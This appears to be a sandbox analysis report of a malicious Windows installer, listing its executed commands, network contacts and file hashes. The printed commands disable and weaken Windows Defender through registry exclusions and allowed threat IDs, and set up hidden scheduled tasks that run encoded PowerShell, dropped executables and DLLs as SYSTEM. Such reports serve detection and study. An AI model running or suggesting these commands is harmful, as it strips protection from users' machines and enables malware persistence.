"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gayVVjwAq" /SC once /ST 08:17:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gayVVjwAq"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gayVVjwAq"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bWLKrWFeqGsUKIPSIT" /SC once /ST 23:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rjhsLhD.exe\" KP /site_id 525403 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rjhsLhD.exe

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rjhsLhD.exe KP /site_id 525403 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SvbbHukzU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SvbbHukzU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYDCXZXPsTrrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYDCXZXPsTrrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nolBHjueEzUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nolBHjueEzUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yOvDRBMJNKKU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yOvDRBMJNKKU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YVKeAuHUOaLCRzVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YVKeAuHUOaLCRzVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\grMXAHIUMHIHAuvw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\grMXAHIUMHIHAuvw\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YVKeAuHUOaLCRzVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YVKeAuHUOaLCRzVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\grMXAHIUMHIHAuvw /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\grMXAHIUMHIHAuvw /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gkftsVzJZ" /SC once /ST 07:07:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gkftsVzJZ"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gkftsVzJZ"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "biFxKMwOTZzXEKwTU" /SC once /ST 12:59:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe\" NQ /site_id 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "biFxKMwOTZzXEKwTU"

C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe

C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe NQ /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bWLKrWFeqGsUKIPSIT"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\SvbbHukzU\hIJhvE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "HvGgydgoxkjNzSQ" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "HvGgydgoxkjNzSQ2" /F /xml "C:\Program Files (x86)\SvbbHukzU\FSnEmZP.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "HvGgydgoxkjNzSQ"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "HvGgydgoxkjNzSQ"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "SuOhdtQTTGzWOe" /F /xml "C:\Program Files (x86)\yOvDRBMJNKKU2\HtGLGFQ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "wXhUETfkEDyNN2" /F /xml "C:\ProgramData\YVKeAuHUOaLCRzVB\MntzzYJ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gmBhVUxyoAiYAznxf2" /F /xml "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\afuTILY.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ESjeOYxIKdVsIzcFOuL2" /F /xml "C:\Program Files (x86)\XYDCXZXPsTrrC\EmzDSqI.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bLgAHCKDimrPMlxXg" /SC once /ST 01:28:38 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\grMXAHIUMHIHAuvw\qGnJVfqS\GRGAgDv.dll\",#1 /site_id 525403" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "bLgAHCKDimrPMlxXg"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\grMXAHIUMHIHAuvw\qGnJVfqS\GRGAgDv.dll",#1 /site_id 525403

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\grMXAHIUMHIHAuvw\qGnJVfqS\GRGAgDv.dll",#1 /site_id 525403

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "biFxKMwOTZzXEKwTU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bLgAHCKDimrPMlxXg"

Network

Country  Destination           Domain               Proto
US       93.184.220.29:80      N/A                  tcp
US       52.168.117.170:443    N/A                  tcp
N/A      224.0.0.251:5353      N/A                  udp
US       209.197.3.8:80        N/A                  tcp
US       209.197.3.8:80        N/A                  tcp
US       209.197.3.8:80        N/A                  tcp
US       8.8.8.8:53            service-domain.xyz   udp
US       3.80.150.121:443      service-domain.xyz   tcp
US       8.8.8.8:53            addons.mozilla.org   udp
NL       108.156.60.59:80      addons.mozilla.org   tcp
NL       108.156.60.59:443     addons.mozilla.org   tcp
US       8.8.8.8:53            clients2.google.com  udp
NL       142.250.179.174:443   clients2.google.com  tcp
US       8.8.8.8:53            api4.check-data.xyz  udp
US       52.41.252.216:80      api4.check-data.xyz  tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zSFDFC.tmp\Install.exe

MD5 4bfffa8735d78ed8bda1fb092371dbe0
SHA1 9228519957b30b93327f023766e013dc64ca23a6
SHA256 1d8cb560979c79c00979be625b799a75cc3584f553c2f02e4bb0730fef445b6a
SHA512 5e1d98fd2447224da097191bf7be536db3d0ea62e99d91f266a5357420525e72ffd99dd7ea3621fce54a9d3ad26d02cfe0f1643ccde4a8c08478af5fd9f3a4aa

C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

